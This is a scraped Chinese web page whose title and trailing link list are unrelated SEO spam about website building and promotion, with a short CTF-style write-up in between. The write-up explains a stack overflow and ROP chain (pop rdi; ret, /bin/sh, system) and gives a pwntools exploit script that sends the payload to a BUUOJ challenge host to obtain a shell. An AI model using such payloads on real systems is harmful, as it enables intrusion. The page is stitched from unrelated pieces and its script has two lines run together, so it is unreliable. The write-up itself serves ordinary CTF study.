当前位置: 首页 > wzjs >正文

银川建设厅网站seodao cn

银川建设厅网站,seodao cn,莱芜吧贴吧 百度,用vue框架做的网站覆盖缓冲区和 RBP: 使用 128 8 字节覆盖 buf 和 rbp。 构造 ROP 链: pop rdi; ret 地址: 将 pop rdi; ret 指令的地址写入返回地址位置。 /bin/sh 地址: 将 /bin/sh 字符串的地址压入栈顶,作为 system 函数的参数。…
  1. 覆盖缓冲区和 RBP:
    使用 128 + 8 字节覆盖 bufrbp

  2. 构造 ROP 链:

    • pop rdi; ret 地址:pop rdi; ret 指令的地址写入返回地址位置。

    • /bin/sh 地址:/bin/sh 字符串的地址压入栈顶,作为 system 函数的参数。

    • system 地址:system 函数的地址写入返回地址位置。

  3. 执行流程:

    • 子函数返回到 pop rdi; ret 指令,该指令将 /bin/sh 地址出栈并存入 rdi 寄存器。

    • 然后程序返回到 system 函数,执行 system("/bin/sh")


一句话总结:

通过覆盖缓冲区和 RBP,构造 ROP 链(pop rdi; ret/bin/sh 地址 → system 地址),使程序执行 system("/bin/sh"),从而获取 shell。

from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=remote('node5.buuoj.cn',25669)payload=b'a'*(0x88)+p64(0x004006b3)+p64(0x00600A90)+p64(0x004004C0)
p.sendline(payload)
p.interactive()

http://www.dtcms.com/wzjs/418285.html

相关文章:

  • 付费网站怎么做专业拓客公司联系方式
  • 网站建设需求怎么提seo推广宣传
  • 外贸网站营销推广网络推广网络营销软件
  • 济南网络公司排行快照关键词优化
  • 社区教育网站建设项目计划书app开发用什么软件
  • 双语网站怎么做颜色广告
  • 临沂网站备案公司线上宣传方案
  • wordpress多图主题化工网站关键词优化
  • 在家做网站建设百度app下载
  • 太原建站一条龙营销中存在的问题及对策
  • 国家电网账号注册网站帐号是什么日喀则网站seo
  • 广州移动 网站设计百度seo快速
  • 商城网站建设浩森宇特鄞州seo整站优化服务
  • 收费视频网站建设营销方案100例
  • 横沥做网站线上营销策略
  • 保定网建站模板广州推广引流公司
  • 雷军做的网站黑帽seo排名优化
  • 个人怎么自己建网站营销型企业网站
  • 网站论坛推广文案怎么做厦门百度快速优化排名
  • 怎么用linux做网站服务器郑州seo优化外包公司
  • 建设网站的法律可行性郑州整站网站优化
  • 宁波做外贸网站建设青岛网站设计公司哪家好
  • h5 响应式手机网站今天上海重大新闻事件
  • 我想在网站上卖食品怎么做长沙h5网站建设
  • 网站开发方案报价怎么做网站赚钱
  • 百度推广 手机网站外贸营销网站建站
  • 市桥网站建设1688如何搜索关键词排名
  • 企业网站提供商在线seo超级外链工具
  • 平面设计培训班大概多少钱优化推广网站seo
  • 网站排名软件网络推广团队哪家好